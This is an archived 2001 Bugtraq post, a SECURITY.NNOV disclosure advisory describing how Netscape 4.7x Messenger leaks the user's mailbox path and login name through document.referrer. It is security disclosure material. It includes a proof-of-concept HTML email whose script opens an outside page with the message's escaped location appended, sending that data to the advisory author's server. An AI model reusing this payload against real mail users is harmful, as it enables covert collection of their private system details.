SECURITY.NNOV: Netscape 4.7x Messanger user information retrival

From: 3APA3A (3APA3Aat_private)
Date: Tue Jun 05 2001 - 05:01:19 PDT

Next message: 3APA3A: "SECURITY.NNOV: Outlook Express address book spoofing"

Previous message: Juergen P. Meier: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Next in thread: Mads Peter Bach: "Re: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Reply: Mads Peter Bach: "Re: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Reply: Thomas Corriher: "Re: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello bugtraq,


There  are  known bugs in Netscape which require information on user's
files location. This bug is not serious one, but it allows to get this
location.


Topic                   : Netscape 4.7x user information retrival
Author                  : 3APA3A <3APA3Aat_private>
Affected software       : Netscape 4.7x All Platforms
Vendor                  : Netscape (IPlanet)
Risk                    : Low
Remotely Exploitable    : Yes
Released                : 30 May 2001
Vendor URL              : http://www.netscape.com
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories



Background:

Netscape  Messanger  uses  internal  protocol  called  mailbox://. The
format of mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

this  URI  contains full path to user's mailbox which usually contains
user's  login  name  and  in case of Windows 9x - the path to Netscape
installation.   It's   impossible  to  determine  this  location  from
javascript    inside    e-mail   message,   because   Netscape   hides
document.location from javascript.

Problem:

It's  possible  to  retrieve mailbox:// URI of the message. E.g., it's
possible to retrieve mailbox location, user's system login and in some
cases path to Netscape installation.

Details:

When  link  invoked  from  message,  Netscape sets "document.referrer"
property  to URI of the message contained this link. Javascript on the
target  page  is  able  to  retrieve  this property and pass it to any
location together with IP of calling machine.

Exploitation:

If  you read this message with Netscape Messanger you can simply click
reference  http://www.security.nnov.ru/files/nsdemo.asp  to  see  your
mailbox location or you can force Netscape user to open this page with
message like this:

-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
 window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A
 HREF="http://www.security.nnov.ru/files/nsdemo.asp"
>
 http://www.security.nnov.ru/files/nsdemo.asp
</A>
</html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted May, 30 2001 via
 http://help.netscape.com/forms/bug-security.html
No feedback were given.


-- 
http://www.security.nnov.ru
         /\_/\
        { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)

Next message: 3APA3A: "SECURITY.NNOV: Outlook Express address book spoofing"
Previous message: Juergen P. Meier: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Next in thread: Mads Peter Bach: "Re: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Reply: Mads Peter Bach: "Re: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Reply: Thomas Corriher: "Re: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 11:43:03 PDT